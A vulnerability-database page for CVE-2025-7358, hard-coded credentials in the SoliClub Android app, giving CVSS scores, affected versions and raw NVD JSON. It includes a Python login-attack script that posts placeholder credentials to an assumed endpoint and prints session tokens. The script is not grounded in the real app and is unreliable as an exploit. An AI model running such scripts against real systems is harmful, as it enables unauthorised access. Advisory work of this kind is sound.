Security Vulnerability Report
中文
CVE-2025-7358 CVSS 7.5 HIGH

CVE-2025-7358

Published: 2025-12-18 15:16:07
Last Modified: 2026-01-16 14:49:38

Description

Use of Hard-coded Credentials vulnerability in Utarit Informatics Services Inc. SoliClub allows Authentication Abuse.This issue affects SoliClub: before 5.3.7.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:utarit:soliclub:*:*:*:*:*:android:*:* - VULNERABLE
SoliClub < 5.3.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-7358 PoC - Hard-coded Credentials in SoliClub # Reference: https://www.cve.org/CVERecord?id=CVE-2025-7358 import requests import sys def exploit_soliclub(target_url): """ Exploit for CVE-2025-7358: Use of Hard-coded Credentials This PoC demonstrates authentication bypass using hardcoded credentials """ # Target endpoint for authentication login_url = f"{target_url}/api/auth/login" # Hardcoded credentials (to be extracted from application) # Note: Actual credentials should be obtained through code analysis hardcoded_username = "admin" hardcoded_password = "admin123" # Example placeholder # Authentication payload payload = { "username": hardcoded_username, "password": hardcoded_password } try: print(f"[*] Attempting authentication to {target_url}") print(f"[*] Using hardcoded credentials: {hardcoded_username}:{hardcoded_password}") response = requests.post(login_url, json=payload, timeout=10) if response.status_code == 200: data = response.json() if data.get('success') or data.get('token'): print("[+] Authentication successful!") print(f"[+] Session token: {data.get('token')}") return True print("[-] Authentication failed") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com:8080") sys.exit(1) target = sys.argv[1] exploit_soliclub(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-7358", "sourceIdentifier": "[email protected]", "published": "2025-12-18T15:16:07.323", "lastModified": "2026-01-16T14:49:38.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use of Hard-coded Credentials vulnerability in Utarit Informatics Services Inc. SoliClub allows Authentication Abuse.This issue affects SoliClub: before 5.3.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:utarit:soliclub:*:*:*:*:*:android:*:*", "versionEndExcluding": "5.3.7", "matchCriteriaId": "0C84BF90-3CCC-4268-AA85-076B3BD533B9"}]}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0466", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}